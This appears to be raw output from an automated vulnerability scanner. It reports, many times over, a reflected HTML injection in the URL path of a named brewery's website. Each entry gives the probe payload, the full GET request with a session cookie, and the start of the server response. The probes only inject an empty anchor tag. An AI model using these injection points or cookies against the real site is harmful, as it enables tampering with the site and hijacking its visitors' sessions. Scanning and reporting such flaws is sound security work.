X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e44"><a>7d1f97cbdd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder85e44"><a>7d1f97cbdd2/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392d4"><a>7acca5121c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beer_finder392d4"><a>7acca5121c2/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d2"><a>16a8c03f2fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers4e8d2"><a>16a8c03f2fd/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.wired.com/playbook/?intcid=gnav
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Set-Cookie: PHPSESSID=rl6vcsjo3iil8biltj6mc4n0r2; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41638"><a>88fb649091c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers41638"><a>88fb649091c/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:48:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 132d9"><a>11e6d305782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers132d9"><a>11e6d305782/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:48:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0387"><a>286a56ca007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beersf0387"><a>286a56ca007/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dad3"><a>57b154d7fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers3dad3"><a>57b154d7fd1/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed707"><a>9aff3285dbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beersed707"><a>9aff3285dbf/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3337e"><a>bf74ccda1f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /beers3337e"><a>bf74ccda1f5/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72af8"><a>8c4153079a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery72af8"><a>8c4153079a4/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ef1f"><a>2fabca1655f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery6ef1f"><a>2fabca1655f/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf8b"><a>2b307023ca2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewerycaf8b"><a>2b307023ca2/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c630"><a>4b43cdb9ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery2c630"><a>4b43cdb9ffe/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd1a"><a>7a2e695ff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery8bd1a"><a>7a2e695ff2/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78fa0"><a>dd60fcefdd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery78fa0"><a>dd60fcefdd7/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a328"><a>58cb21c931b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /brewery1a328"><a>58cb21c931b/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bebf4"><a>6ff175caf2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersbebf4"><a>6ff175caf2b/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload becda"><a>fd1c2df5815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersbecda"><a>fd1c2df5815/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd34a"><a>b8b6cd26d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersfd34a"><a>b8b6cd26d1a/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4b5f"><a>54c1eee5e30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersb4b5f"><a>54c1eee5e30/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ea2"><a>efc19015908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersd9ea2"><a>efc19015908/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea81e"><a>7759b9fb197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careersea81e"><a>7759b9fb197/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87c5"><a>07d9d56d600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /careerse87c5"><a>07d9d56d600/content/js/combined.js HTTP/1.1
